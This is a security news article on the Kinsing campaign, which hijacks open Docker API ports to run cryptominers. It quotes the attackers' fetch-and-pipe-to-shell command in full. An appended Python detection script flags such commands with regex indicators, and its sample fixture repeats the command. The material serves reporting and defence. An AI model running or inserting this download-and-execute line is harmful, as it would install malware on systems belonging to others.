The Docker cloud containerization technology is under fire, with an organized, self-propagating cryptomining campaign targeting misconfigured open Docker Daemon API ports.

Thousands of container-compromise attempts are being observed every day as part of the campaign, according to Gal Singer, a security researcher at AquaSec. The effort has been ongoing for months. However, since the beginning of the year, the number of daily attempts has far exceeded what was seen before, he said.

“We…believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor,” he wrote, in an analysis posted on Friday.

Kinsing’s Infection Routine

The attack pattern starts with the attackers identifying a misconfigured Docker API port that has been left open to the public internet. They then access that open port and the Docker instance connected to it, and run a rogue Ubuntu container. The container issues a command that fetches the Kinsing malware, which in turn downloads and runs a cryptominer. In the final stage of the infection, Kinsing attempts to propagate to other containers and hosts.

[Figure: A summary of the attack components. Source: AquaSec.]

The same initial command is used in every attack, according to Singer: “/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 126.96.36.199/d.sh | sh;tail -f /dev/null.” This…
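As an added example (not code from the article or from AquaSec), the Python below triages `docker inspect`-style container records for the traits of the initial command quoted above. The indicator names, the threshold of two matches and the sample records are assumptions made for illustration; 203.0.113.10 is a documentation address.

```python
from __future__ import annotations
import re

# Indicators derived from the initial command quoted in the article.
INDICATORS = {
    "installs_downloader": re.compile(r"apt-get\s+install\b[^;&|]*\b(wget|curl)\b"),
    "starts_cron": re.compile(r"service\s+cron\s+start"),
    "pipes_download_to_shell": re.compile(r"\b(wget|curl)\b[^;&|]*\|\s*(ba)?sh\b"),
    "keepalive_tail": re.compile(r"tail\s+-f\s+/dev/null"),
}


def command_line(container: dict) -> str:
    """Join Entrypoint and Cmd from a `docker inspect`-style record."""
    cfg = container.get("Config", {})
    # Either field may be null in inspect output, so fall back to an empty list.
    return " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))


def match_indicators(container: dict) -> list[str]:
    """Return the sorted names of all indicators found in the container command."""
    cmd = command_line(container)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))


def triage(containers: list[dict], threshold: int = 2) -> dict[str, list[str]]:
    """Map container name -> indicators for records with >= threshold matches.

    A single match (for example a bare `tail -f /dev/null` keep-alive) is
    common in benign containers, so the default threshold (an assumption) is two.
    """
    hits = {}
    for c in containers:
        found = match_indicators(c)
        if len(found) >= threshold:
            hits[c.get("Name", "<unnamed>")] = found
    return hits


# Constructed sample records, not data from the article.
SAMPLE = [
    {"Name": "/web", "Config": {"Image": "nginx", "Entrypoint": ["/docker-entrypoint.sh"],
                                "Cmd": ["nginx", "-g", "daemon off;"]}},
    {"Name": "/idle", "Config": {"Image": "ubuntu", "Entrypoint": None,
                                 "Cmd": ["tail", "-f", "/dev/null"]}},
    {"Name": "/unknown", "Config": {"Image": "ubuntu", "Entrypoint": None, "Cmd": [
        "/bin/bash", "-c",
        "apt-get update && apt-get install -y wget cron;service cron start; "
        "wget -q -O - 203.0.113.10/d.sh | sh;tail -f /dev/null"]}},
]

if __name__ == "__main__":
    for name, found in triage(SAMPLE).items():
        print(name, found)
```

Lowering the threshold to one also surfaces the idle Ubuntu container, which shows why a keep-alive command alone is too weak a signal to alert on.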
Self-Propagating Malware Targets Thousands of Docker Ports Per Day (posted by govanguard, 2020-04-03 15:31:00)